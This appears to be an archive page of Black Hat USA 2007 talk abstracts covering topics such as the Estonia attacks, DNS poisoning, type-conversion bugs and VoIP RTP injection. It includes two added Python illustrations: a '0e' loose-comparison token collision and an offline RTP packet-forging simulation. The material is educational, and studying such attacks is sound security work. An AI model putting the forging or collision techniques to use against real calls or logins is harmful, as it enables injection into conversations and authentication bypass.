
Black Hat Briefings, USA 2007 [Audio] Presentations from the security conference.

Jeff Moss


About Us

Past speeches and talks from the Black Hat Briefings computer security conferences.

The Black Hat Briefings USA 2007 was held August 1-3 in Las Vegas at Caesars Palace. Two days, sixteen tracks, over 95 presentations. Three keynote speakers: Richard Clarke, Tony Sager and Bruce Schneier.
A post convention wrap up can be found at http://www.blackhat.com/html/bh-usa-07/bh-usa-07-index.html

Black Hat Briefings bring together a unique mix in security: the best minds from government agencies and global corporations with the underground's most respected hackers. These forums take place regularly in Las Vegas, Washington D.C., Amsterdam, and Tokyo.

Video, audio and supporting materials from past conferences will be posted here, starting with the newest and working our way back to the oldest, with new content added as available! Past speeches and talks from Black Hat in an iPod-friendly .mp4 H.264 192k video format. If you want to get a better idea of the presentation materials, go to http://www.blackhat.com/html/bh-media-archives/bh-archives-2007.html and download them. Put up the PDFs in one window while watching the talks in the other. Almost as good as being there!

Latest Episodes

Gadi Evron: Estonia: Information Warfare and Strategic Lessons

In this talk we will discuss what is now referred to as "The 'first' Internet War", where Estonia was under massive online attacks for a period of three weeks, following tensions with the local Russian population. Following a riot in the streets of Tallinn, an online assault began, resulting in a large-scale coordination of the Estonian defenses on both the local and international levels. We will demonstrate what in hindsight worked for both the attackers and the defenders, as well as what failed. Following the chronological events and technical information, we will explore what impact these attacks had on Estonia's civil infrastructure and daily life, and how they impacted its economy during the attacks. Once we cover that ground, we will evaluate what we have so far discussed and elaborate on lessons learned while Gadi was in Estonia and from the post-mortem he wrote for the Estonian CERT. We will conclude our session by recognizing case studies on the strategic level, which can b...

73 min, 2007 Dec 12

HD Moore & Valsmith: Tactical Exploitation-Part 2

Penetration testing often focuses on individual vulnerabilities and services. This talk introduces a tactical approach that does not rely on exploiting known vulnerabilities. Using a combination of new tools and obscure techniques, I will walk through the process of compromising an organization without the use of normal exploit code. Many of the tools will be made available as new modules for the Metasploit Framework. REVIEWER NOTES: This is a monstrous presentation and will absolutely require the 150-minute time slot. For a smaller version of this presentation, please see my other submission (System Cracking with Metasploit 3). The goal of this presentation is to show some of the non-standard ways of breaking into networks, methods that are often ignored by professional pen-testing teams.

72 min, 2007 Dec 12

Joe Stewart: Just Another Windows Kernel Perl Hacker

This talk will detail the Windows remote kernel debugging protocol and present a Perl framework for communicating with the kernel debug API over a serial/USB/1394 port from non-Windows systems. This leads to some interesting possibilities for hacking the kernel, such as code injection, hooking, forensics, sandboxing and more, all controlled from a separate non-Windows machine.

18 min, 2006 Jan 10

Jerry Schneider: Reflection DNS Poisoning

Targeting an enterprise attack at just a few employees seems to be yielding the best results, since it lowers the risk of discovering the exploit. Yet the typical DNS cache poisoning approach, aimed at various levels in the DNS server hierarchy or the enterprise server itself, is not as effective as it could be, primarily because so many people are affected that detection is rapid... There is one approach to DNS cache poisoning that can control the attack surface and is particularly effective when executed from within the enterprise. Rather than attempting to poison the enterprise DNS server or other external caches, the internal DNS cache within a Windows PC is targeted. Additionally, forensic analysis of the infected PC is hindered by the time-to-live and volatility of these cache entries. I will demonstrate this type of attack using two machines on a local LAN, and include some analysis of the firewall and configuration issues needed to defend against this type of exploit.

19 min, 2006 Jan 10

Stephan Patton: Social Network Site Data Mining

Social Network Sites contain a wealth of public information. This information is of great interest to researchers, investigators, and forensic experts. This presentation presents research regarding an approach to automated site access, and the implications of site structure. Associated tools and scripts will be explained. Additionally, investigative techniques with the recovered information will be covered.

23 min, 2006 Jan 10

Jeff Morin: Type Conversion Errors: How a Little Data Type Can Do a Whole Lot of Damage

In the realm of application testing, one of the major but most often overlooked vulnerabilities is that of type conversion errors. These errors result from input variable values being used throughout the many areas and codebases that make up the application, and in doing so, potentially being treated as different data types throughout the processing. The application functions correctly and without issue because the values of the input variable are anticipated, even though they are treated in different areas as different data types. The issue arises when a value is input into one of these variables that is crafted in such a way as to be successfully manipulated by some data types while failing others, resulting in the application behaving in unanticipated and potentially dangerous ways. These vulnerabilities are much more difficult to identify than simple error-based SQL injection or XSS, as they don't readily display success or failure, but rather can manifest themselves in other a...

10 min, 2006 Jan 10
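
An added example in Python (not from the talk) of the class of bug the abstract describes: one input string seen by three layers that each apply their own conversion rules, plus a helper that lists the inputs on which the layers disagree, which is where a tester should look. The three layer functions, the sample inputs and the loose comparison are constructed for illustration and are not any real application's code.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample inputs; each one is "a number" to at least one layer below.
SAMPLE_INPUTS = ["42", " 42 ", "+42", "4_2", "４２", "1e3", "nan"]


def layer_regex(value: str) -> Optional[int]:
    """Input filter (hypothetical): only ASCII decimal digits count as a number."""
    return int(value) if re.fullmatch(r"[0-9]+", value) else None


def layer_int(value: str) -> Optional[int]:
    """Business logic (hypothetical): Python's int(), which also accepts surrounding
    whitespace, a sign, underscores between digits and non-ASCII Unicode digits."""
    try:
        return int(value)
    except ValueError:
        return None


def layer_float(value: str) -> Optional[float]:
    """Reporting layer (hypothetical): float(), which additionally accepts
    exponent notation and the words inf/nan."""
    try:
        return float(value)
    except ValueError:
        return None


def disagreements(inputs: List[str]) -> List[Tuple[str, Optional[int], Optional[int], Optional[float]]]:
    """Inputs on which the three layers differ in whether they accept the value
    or in the value they produce. Every one of these is a candidate test case."""
    found = []
    for s in inputs:
        a, b, c = layer_regex(s), layer_int(s), layer_float(s)
        accepted = {x is not None for x in (a, b, c)}
        values = {x for x in (a, b, c) if x is not None}
        if len(accepted) > 1 or len(values) > 1:
            found.append((s, a, b, c))
    return found


def loose_equals(a: str, b: str) -> bool:
    """Emulates a comparison that converts numeric-looking strings to numbers before
    comparing, as the loose == of several languages does (constructed, not a real API)."""
    fa, fb = layer_float(a), layer_float(b)
    if fa is not None and fb is not None:
        return fa == fb
    return a == b


def token_matches(supplied: str, stored: str) -> bool:
    """A check that works for anticipated tokens but collapses distinct strings
    that float() happens to parse to the same number, e.g. '0e12345' and '0e99999'."""
    return loose_equals(supplied, stored)
```

The point of `disagreements` is that nothing errors out: " 42 " and "４２" are rejected by the filter yet become 42 downstream, and "1e3" is rejected everywhere except the layer that turns it into 1000.0. `token_matches` shows the damage end: any two stored and supplied values of the form 0e followed by digits compare equal, without any error message that a scanner looking for SQL injection or XSS responses would notice.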

Charlie Miller: Hacking Leopard: Tools and Techniques for Attacking the Newest Mac OS X

According to the Apple website, "Mac OS X delivers the highest level of security through the adoption of industry standards, open software development and wise architectural decisions." Of course, the Month of Apple Bugs showed that Macs are just as susceptible to vulnerabilities as other operating systems. Arguably, the two factors keeping the number of announced vulnerabilities on Mac OS X low are that not many researchers are interested in exploring this operating system due to low market share, and not many researchers are familiar with the platform, which can introduce a steep learning curve. The first of these reasons is going away as Apple's market share continues to rise. This talk hopes to address the second reason. Namely, to provide researchers already familiar with Windows and Linux the knowledge and tools necessary to search for new security bugs in this operating system, specifically the new forthcoming release of "Leopard", the newest version of Mac OS X. Happily, there...

25 min, 2006 Jan 10

Iain Mcdonald: Longhorn Server Foundation & Server Roles

Iain will discuss Server Foundation and Server Roles: how Longhorn Server applied the principles of attack surface minimization. This talk will detail the mechanics of LH Server componentization and then discuss the primary roles. You will learn how to install and manage a server that doesn't have a video driver and will hear about File Server, Web Server, Read Only Domain Controller, etc.

27 min, 2006 Jan 10

David Leblanc: Practical Sandboxing: Techniques for Isolating Processes

The sandbox created for the Microsoft Office Isolated Converter Environment will be demonstrated in detail. The combination of restricted tokens, job objects, and desktop changes needed to seriously isolate a process will be demonstrated, along with a demonstration of why each layer is needed.

23 min, 2006 Jan 10

Zane Lackey: Point, Click, RTPInject

The Real-time Transport Protocol (RTP) is a common media layer shared between H.323, SIP, and Skinny (SCCP) VoIP deployments. RTP is responsible for the actual voice/audio stream in VoIP networks; hence attacks against RTP are valid against the bulk of VoIP installations in enterprise environments. Since signaling (H.323/SIP/SCCP) and media transfer (RTP) are handled by two separate protocols, injecting audio into a stream is often the most damaging attack against RTP. RTP is vulnerable to audio injection due to its lack of integrity protection and its wide tolerance of sequence information. The presentation will demonstrate an easy-to-use GUI VoIP injection attack tool for RTP appropriately named RTPInject. The tool, with zero setup prerequisites, allows an attacker to inject arbitrary audio into an existing conversation involving at least one VoIP endpoint. RTPInject automatically detects RTP streams on the wire, enumerates the codecs in use, and displays this information to the user....

14 min, 2006 Jan 10
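
An added example in Python, not RTPInject's own code, of the two properties the abstract relies on. It decodes the fixed RTP header (RFC 3550) from packets constructed inline, forges packets that copy the observed stream's SSRC and payload type while jumping ahead in sequence number and timestamp, and runs them through a model receiver that plays any packet whose SSRC matches and whose sequence number is newer than the last one played. The payload type (PCMU), SSRC value, sequence numbers, packet contents and the receiver model are all assumptions; nothing is put on the network.

```python
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

PCMU = 0                  # static payload type 0: G.711 mu-law, 8 kHz
SAMPLES_PER_PACKET = 160  # 20 ms of audio per packet at 8 kHz
HEADER_FMT = "!BBHII"     # fixed 12-byte RTP header (RFC 3550 section 5.1)


@dataclass
class RtpHeader:
    version: int
    payload_type: int
    marker: bool
    sequence: int
    timestamp: int
    ssrc: int


def parse_rtp(packet: bytes) -> RtpHeader:
    """Decode the fixed header; CSRC list and header extensions are ignored here."""
    if len(packet) < 12:
        raise ValueError("short RTP packet")
    b0, b1, seq, ts, ssrc = struct.unpack(HEADER_FMT, packet[:12])
    return RtpHeader(version=b0 >> 6, payload_type=b1 & 0x7F, marker=bool(b1 & 0x80),
                     sequence=seq, timestamp=ts, ssrc=ssrc)


def build_rtp(payload_type: int, sequence: int, timestamp: int, ssrc: int,
              payload: bytes, marker: bool = False) -> bytes:
    """Encode version 2, no padding/extension/CSRC, followed by the audio payload."""
    b1 = (0x80 if marker else 0) | (payload_type & 0x7F)
    return struct.pack(HEADER_FMT, 0x80, b1, sequence & 0xFFFF,
                       timestamp & 0xFFFFFFFF, ssrc) + payload


def forge_packets(seen: RtpHeader, frames: List[bytes], lead: int = 1) -> List[bytes]:
    """Packets claiming to be the next ones in the observed stream: same SSRC and
    payload type, sequence and timestamp advanced so they precede the real ones."""
    return [build_rtp(seen.payload_type, seen.sequence + lead + i,
                      seen.timestamp + (lead + i) * SAMPLES_PER_PACKET, seen.ssrc, f)
            for i, f in enumerate(frames)]


class NaiveReceiver:
    """Endpoint with no integrity check: plays a packet if the SSRC matches and the
    sequence number is newer (mod 2**16) than the last one played."""

    def __init__(self, ssrc: int) -> None:
        self.ssrc = ssrc
        self.last_seq: Optional[int] = None
        self.played: List[bytes] = []

    def accept(self, packet: bytes) -> bool:
        h = parse_rtp(packet)
        if h.version != 2 or h.ssrc != self.ssrc:
            return False
        if self.last_seq is not None:
            delta = (h.sequence - self.last_seq) & 0xFFFF
            if delta == 0 or delta >= 0x8000:   # duplicate, or older than what was played
                return False
        self.last_seq = h.sequence
        self.played.append(packet[12:])
        return True


def run_scenario() -> List[Tuple[str, bool]]:
    """Constructed run: six legitimate packets; the attacker sees the third on the
    wire and races two forged ones in ahead of the fourth and fifth."""
    ssrc = 0x11223344
    silence = bytes([0xFF]) * SAMPLES_PER_PACKET
    tone = bytes([0x00]) * SAMPLES_PER_PACKET
    legit = [build_rtp(PCMU, 1000 + i, 5_000_000 + i * SAMPLES_PER_PACKET, ssrc, silence)
             for i in range(6)]
    forged = forge_packets(parse_rtp(legit[2]), [tone, tone])
    rx, log = NaiveReceiver(ssrc), []
    for p in legit[:3]:
        log.append(("legit", rx.accept(p)))
    for p in forged:                   # arrive before the real seq 1003 and 1004
        log.append(("forged", rx.accept(p)))
    for p in legit[3:]:                # the real 1003/1004 now look stale and are dropped
        log.append(("legit", rx.accept(p)))
    return log
```

Everything the forger needs (SSRC, payload type, current sequence number and timestamp) is readable from a single sniffed packet, which is why the tool needs no setup. The real packets that arrive afterwards are indistinguishable from ordinary reordering and are silently discarded. The fix at the protocol level is SRTP (RFC 3711), whose per-packet authentication tag makes a forged packet fail verification regardless of its sequence number.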
